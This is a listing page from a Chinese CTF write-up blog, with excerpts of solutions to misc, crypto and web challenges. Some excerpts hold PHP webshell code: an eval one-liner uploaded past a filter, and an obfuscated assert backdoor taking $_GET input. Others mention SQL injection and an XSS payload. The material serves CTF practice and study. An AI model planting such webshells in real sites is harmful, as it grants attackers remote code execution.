![](https://img-blog.csdnimg.cn/2020031609283411.jpg?x-oss-process=image/resize,m_fixed,h_224,w_224)
CTF WP
记录各大CTF平台的WP,纯粹便于渣渣用来日后复习,欢迎批评指正(大佬不喜勿喷)。
ChanCherry、
信安小白,欢迎大家多多交流! CSDN大多数时候好像用来记笔记[捂脸]
个人博客:https://chancherry.github.io/
有事可以Q我3324838931
展开
-
新春战役网络安全公益赛-2020-misc-磁盘套娃
题目给了一个压缩包,原创 2020-05-15 17:34:13 · 1215 阅读 · 0 评论 -
Bugku——加密wp
N : 4606578138842896098963720565855441724853181170262462638997443292374927018206272195560077882005901191361738959890013821515360068538233263828923631436043145186863887860029892488008148612485950753262...原创 2020-02-26 16:00:25 · 2316 阅读 · 0 评论 -
2017第二届广东省强网杯线上赛misc-Bubble
下载文件下来,解压得到一个flag.enc,用winHex看了一下,得到一串字符xinik-samak-luvag-hutaf-fysil-notok-mepek-vanyh-zipef-hilok-detok-damif-cusol-fezyx看题目bubble,想到会不会是什么bubble加密的。百度了一下,还真的有Bubble Babble Encoding,借鉴了大佬的wp。Bub...原创 2020-02-21 13:21:23 · 337 阅读 · 0 评论 -
BUU misc(GXYCTF2019)
下载压缩包之后是一张gakki的图片,foremost一下,得到一个压缩包,包里有flag.txt,但是需要密码才能打开。尝试数字爆破,得到密码8864,打开之后得到一串奇奇怪怪的字符,看了大佬的wp,对于这种无规律的字符集要尝试字频统计,附上字频统计exp:alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1...原创 2020-01-31 16:07:53 · 2262 阅读 · 0 评论 -
Bugku INSERT-INTO注入
error_reporting(0);function getIp(){$ip = '';if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];}else{$ip = $_SERVER['REMOTE_ADDR'];}$ip_arr = explode(',', $ip...原创 2019-11-20 00:39:14 · 190 阅读 · 0 评论 -
[强网杯 2019]随便注
很感谢可以在BUU平台上复现这道题,感谢赵师傅!这篇wp借鉴了大佬的,为了自己日后学习需要就写了,大佬不喜勿喷QAQ首先要知道堆叠注入的原理:在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么...转载 2019-11-19 07:41:17 · 987 阅读 · 0 评论 -
i春秋 web“百度杯”CTF比赛 九月场-Upload & code
“百度杯”CTF比赛 九月场Upload可以上传文件,并且上传之后可以点击源码链接打开文件,上传了这几句话:<?php@eval($POST["code"]);?>结果发现<?php被过滤了,于是用php脚本标记来绕过过滤:<script language="PHP">$fh=fopen("../flag.".strtolower("PHP"),'r...原创 2019-10-13 17:30:26 · 983 阅读 · 0 评论 -
Bugku web1
web2一打开网页,好多表情朝你涌来,不管那么多,F12查看一下,就会看到flag。计算器F12查看一下源码web基础$_GETurl传入?what=flagweb基础$_POST原创 2019-09-28 22:22:19 · 917 阅读 · 0 评论 -
Bugku杂项 wp1
这是一张单纯的图片用winhex打开,发现一些不正常的编码,http://tool.chinaz.com/tools/unicode.aspxASCII转Unicode一下,得到key{you are right}隐写图片第二行第2,3列是图片宽,6,7列是高,把第六列01改为11,保存下来,即可看到flag。telnet...原创 2019-10-03 14:59:29 · 1987 阅读 · 0 评论 -
Bugku杂项 wp2
闪的好快gif动图,用stegsolve打开,然后Analysis->Frame Browser。共有18帧,拿着手机一张一张扫,扫出来的结果是SYC{F1aSh-so-f4sT}但是提交不正确。最后更改为SYC{F1aSh_so_f4sT}come_game下载下来,发现是一个游戏运行.exe文件,进入游戏界面,按照界面提示,shift键和上下左右键控制游戏随便玩一下,E...原创 2019-10-04 00:44:52 · 332 阅读 · 0 评论 -
攻防世界杂项 gif
下载压缩包下来,有两个文件夹,其中_MACOSX中有个图片,不过损坏了不能查看,gif里面有104张(0-103)黑白图片,黑白联想到二进制,白对应0,黑对应1,然后二进制转为字符串,运行脚本就OKwhite = open('C:/Users/Downloads/gif/0.jpg', 'rb').read()black = open('C:/Users/Downloads/gif/1....原创 2019-10-08 17:10:27 · 819 阅读 · 0 评论 -
二刷bugku web
过狗一句话首先题目给了一段话,送给大家一个过狗一句话<?php $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) ?>...原创 2019-10-09 20:04:00 · 274 阅读 · 0 评论 -
Moctf Web
php黑魔法emmm传送门只有下图,查看源代码,也没有发现什么,于是,查看一下http://119.23.73.3:5001/web5/index.php,还是什么都没有,大佬提示访问http://119.23.73.3:5001/web5/index.php~,然后查看源代码,大致意思是参数a,b的md5值相等,但a不等于b,就可以输出flag。两种方法:1.构造数组,md5加密遇到...原创 2019-09-25 18:20:28 · 157 阅读 · 0 评论 -
BUUCTF snake(实验吧Snake)
题目表面上给的是一张jpg图片,但是binwalk一下,里面有压缩包,binwalk snake.jpg -e解压一下,里面有两个文件,一个key,一个cipher,打开key,有一串base64字符,V2hhdCBpcyBOaWNraSBNaW5haidzIGZhdm9yaXRlIHNvbmcgdGhhdCByZWZlcnMgdG8gc25ha2VzPwo=解码之后,得到:What ...原创 2019-08-13 14:25:44 · 5047 阅读 · 1 评论 -
BUUCTF MISC Wp2
0x09 rar套路和基础破解那道题一模一样,(ˉ▽ˉ;)…具体见上一篇博客原创 2019-08-13 14:55:05 · 2683 阅读 · 0 评论 -
JACTF web签到
首先查看源代码,发现3719372767312836781.js可能会有点东西。<!DOCTYPE html><html><head> <title>签到</title> <meta charset="utf-8"> <script type="text/javascript" src="./37193727...原创 2019-08-15 10:42:00 · 351 阅读 · 0 评论 -
JACTF misc wp
0x00 该死的温柔查看属性,guess,呃呃,看了大佬博客,才知道是guess隐写,在kali上用outguess还原即可。先安装一下outguess, kail终端命令输入git clone https://github.com/crorvick/outguess,安装包随即下载到文件夹。双击打开文件夹,右键点击空白区域选终端打开。随后输入以下命令./configure &&am...原创 2019-08-15 21:07:22 · 4377 阅读 · 2 评论 -
Bugku pwn
pwn1在Linux里面输入以下命令,nc 114.116.54.89 10001 //nc用于设置路由器ls -l然后cat flag,即可得到flagnc命令nc命令是一个功能打包的网络实用程序,它通过命令行在网络上读取和写入数据;nc是为NMAP项目编写的,是目前已分裂的netcat家族的顶峰,它被设计成一个可靠的后端工具,可以立即为其他用户提供网络连接应用程序和用户。nc不...原创 2019-08-25 23:08:14 · 763 阅读 · 0 评论 -
MOCTF misc
0x00 假装安全题目给了一个carefully.jpg,用记事本打开发现有flag.txt,于是binwalk一下,果然,里面有个zip,其中有个flag.txt,binwalk -e carefully.jpg解压一下,得到一个压缩包和flag.txt,打开flag.txt就可以看到一串像是flag的东西:mcfCrflyS1eot{@eul_ld}栅栏密码解密,即可得到moctf{...原创 2019-08-16 18:33:40 · 239 阅读 · 0 评论 -
攻防世界MISC 功夫再高也怕菜刀
下载附件,用foremost进行pcapng文件的分离,得到一个zip,打开zip,得到一份加密的flag.txt文件。然后用wireshark打开pcapng文件,查找flag.txt关键字,发现有个6666.jpg,右键第1150个数据包,追踪TCP流,复制从FFD8开始到FFD9的内容,到winHex里新建文件粘贴,注意粘贴格式是ASCII Hex。保存为jpg格式,可以得到图片,...原创 2019-08-17 16:11:23 · 4375 阅读 · 0 评论 -
NWU-CTF web
0x00 机器人知道robots.txt文件的话,就很容易做出来了,robots.txt文件可以见我之前的博客0x01 让我们来弹一个flag题目给了学习资料,然后根据它的提示,输入<script>alert('flag')</script>,即可得到nwuctf{XSS_Is_A_Important_Vul}0x02 php弱类型查看源码,//try agai...原创 2019-09-15 23:29:28 · 345 阅读 · 0 评论 -
i春秋Web wp
0x00 爆破-1<?phpinclude "flag.php";$a = @$_REQUEST['hello'];if(!preg_match('/^\w*$/',$a )){ die('ERROR');}eval("var_dump($$a);");show_source(__FILE__);?>这个代码的意义是如果匹配正则/^\w*$/,就打印变量$$a。...原创 2019-09-16 23:59:50 · 501 阅读 · 0 评论 -
NWUCTF-misc
0x00 zip文件伪加密一个 ZIP 文件由三个部分组成:压缩源文件数据区+压缩源文件目录区+压缩源文件目录结束标志普及一下知识,(●’◡’●)压缩源文件数据区:50 4B 03 04:这是头文件标记(0x04034b50)14 00:解压文件所需 pkware 版本00 00:全局方式位标记(有无加密)08 00:压缩方式5A 7E:最后修改文件时间F7 46:最后修改文件...原创 2019-09-18 20:44:11 · 297 阅读 · 0 评论 -
Moctf死亡退出Write up
一开始就看到了源码,萌新表示大致看得懂什么意思,大致分析下:第四行@c.=c.=c.=_POST[‘c’]; //@为屏蔽错误不显示在浏览器界面,POST[′c′]是以post的方式获取字符串类型的变量c,".="表示变量c会与之前变量中的<?phpexit;?>进行字符串连接。很显然题目需要我们以post的方式提交变量c使&...原创 2019-07-16 19:22:19 · 828 阅读 · 2 评论